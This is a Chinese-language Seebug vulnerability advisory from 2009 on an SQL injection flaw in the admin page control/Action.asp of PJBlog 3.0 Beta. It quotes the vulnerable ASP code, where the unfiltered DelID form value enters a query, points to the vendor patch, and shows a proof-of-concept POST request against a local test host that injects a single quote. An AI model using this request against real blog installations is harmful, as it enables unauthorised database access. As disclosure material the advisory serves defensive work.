PJBlog博客系统后台Action.asp页面DelUserID变量过滤不严导致SQL注入缺陷

2009-05-08T00:00:00
ID SSV:11242
Type seebug
Reporter Root
Modified 2009-05-08T00:00:00

Description

文件control/ Action.aspp中:

  1. ElseIf Request.Form("whatdo") = "DelUser" Then //第510行
  2. Dim DelUserID, DelUserName, blogmemberNum, DelUserStatus
  3. DelUserID = Request.Form("DelID")
  4. blogmemberNum = conn.Execute("select count(mem_ID) from blog_Member where mem_Status='SupAdmin'")(0)
  5. DelUserStatus = conn.Execute("select mem_Status from blog_Member where mem_ID="&DelUserID)(0)

变量DelUserID没有过滤放入sql语句导致注入漏洞的产生。

3.0 Beta PJblog


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: <a href=http://bbs.pjhome.net/thread-48122-1-1.html target=_blank rel=external nofollow>http://bbs.pjhome.net/thread-48122-1-1.html</a>

                                        
                                            
                                                POST /ConContent.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://127.0.0.1:103/ConContent.asp?Fmenu=Categories
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)
Host: 127.0.0.1:103
Content-Length: 102
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PJBlog3Setting=ViewType=normal; PJBlog3=memRight=111111111111&amp;memName=admin&amp;memHashKey=01c1dc172188d12f917e6c2492e787d43ce0966c; ASPSESSIONIDQAABRAAQ=LAJBLBADFALCDBPMDPHHNCGL; ASP.NET_SessionId=052531uhossk1155ks5dm245; CheckCode=4633B8B4FA46833C; ASPSESSIONIDCABCSCDT=ICDNLLBDEBHJHCMNKBICIECH; ASPSESSIONIDQABBRABQ=IPGLOPCDNGMADODNDNMDLALO

action=Members&amp;whatdo=DelUser&amp;DelID=1%27&amp;Submit=%E4%BF%9D%E5%AD%98%E6%97%A5%E5%BF%97%E5%88%86%E7%B1%BB